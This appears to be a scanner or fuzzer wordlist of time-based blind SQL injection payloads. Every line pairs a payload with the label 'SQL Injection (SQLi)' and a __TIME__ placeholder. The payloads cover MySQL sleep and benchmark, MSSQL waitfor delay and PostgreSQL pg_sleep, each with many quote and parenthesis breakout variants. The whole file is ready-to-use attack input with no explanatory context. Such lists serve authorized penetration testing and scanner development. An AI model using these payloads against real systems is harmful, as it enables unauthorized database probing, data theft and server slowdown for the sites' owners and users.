sleep(__TIME__)#:::SQL Injection (SQLi)
1 or sleep(__TIME__)#:::SQL Injection (SQLi)
" or sleep(__TIME__)#:::SQL Injection (SQLi)
' or sleep(__TIME__)#:::SQL Injection (SQLi)
" or sleep(__TIME__)=":::SQL Injection (SQLi)
' or sleep(__TIME__)=':::SQL Injection (SQLi)
1) or sleep(__TIME__)#:::SQL Injection (SQLi)
") or sleep(__TIME__)=":::SQL Injection (SQLi)
') or sleep(__TIME__)=':::SQL Injection (SQLi)
1)) or sleep(__TIME__)#:::SQL Injection (SQLi)
")) or sleep(__TIME__)=":::SQL Injection (SQLi)
')) or sleep(__TIME__)=':::SQL Injection (SQLi)
;waitfor delay '0:0:__TIME__'--:::SQL Injection (SQLi)
);waitfor delay '0:0:__TIME__'--:::SQL Injection (SQLi)
';waitfor delay '0:0:__TIME__'--:::SQL Injection (SQLi)
";waitfor delay '0:0:__TIME__'--:::SQL Injection (SQLi)
');waitfor delay '0:0:__TIME__'--:::SQL Injection (SQLi)
");waitfor delay '0:0:__TIME__'--:::SQL Injection (SQLi)
));waitfor delay '0:0:__TIME__'--:::SQL Injection (SQLi)
'));waitfor delay '0:0:__TIME__'--:::SQL Injection (SQLi)
"));waitfor delay '0:0:__TIME__'--:::SQL Injection (SQLi)
benchmark(10000000,MD5(1))#:::SQL Injection (SQLi)
1 or benchmark(10000000,MD5(1))#:::SQL Injection (SQLi)
" or benchmark(10000000,MD5(1))#:::SQL Injection (SQLi)
' or benchmark(10000000,MD5(1))#:::SQL Injection (SQLi)
1) or benchmark(10000000,MD5(1))#:::SQL Injection (SQLi)
") or benchmark(10000000,MD5(1))#:::SQL Injection (SQLi)
') or benchmark(10000000,MD5(1))#:::SQL Injection (SQLi)
1)) or benchmark(10000000,MD5(1))#:::SQL Injection (SQLi)
")) or benchmark(10000000,MD5(1))#:::SQL Injection (SQLi)
')) or benchmark(10000000,MD5(1))#:::SQL Injection (SQLi)
pg_sleep(__TIME__)--:::SQL Injection (SQLi)
1 or pg_sleep(__TIME__)--:::SQL Injection (SQLi)
" or pg_sleep(__TIME__)--:::SQL Injection (SQLi)
' or pg_sleep(__TIME__)--:::SQL Injection (SQLi)
1) or pg_sleep(__TIME__)--:::SQL Injection (SQLi)
") or pg_sleep(__TIME__)--:::SQL Injection (SQLi)
') or pg_sleep(__TIME__)--:::SQL Injection (SQLi)
1)) or pg_sleep(__TIME__)--:::SQL Injection (SQLi)
")) or pg_sleep(__TIME__)--:::SQL Injection (SQLi)
')) or pg_sleep(__TIME__)--:::SQL Injection (SQLi)
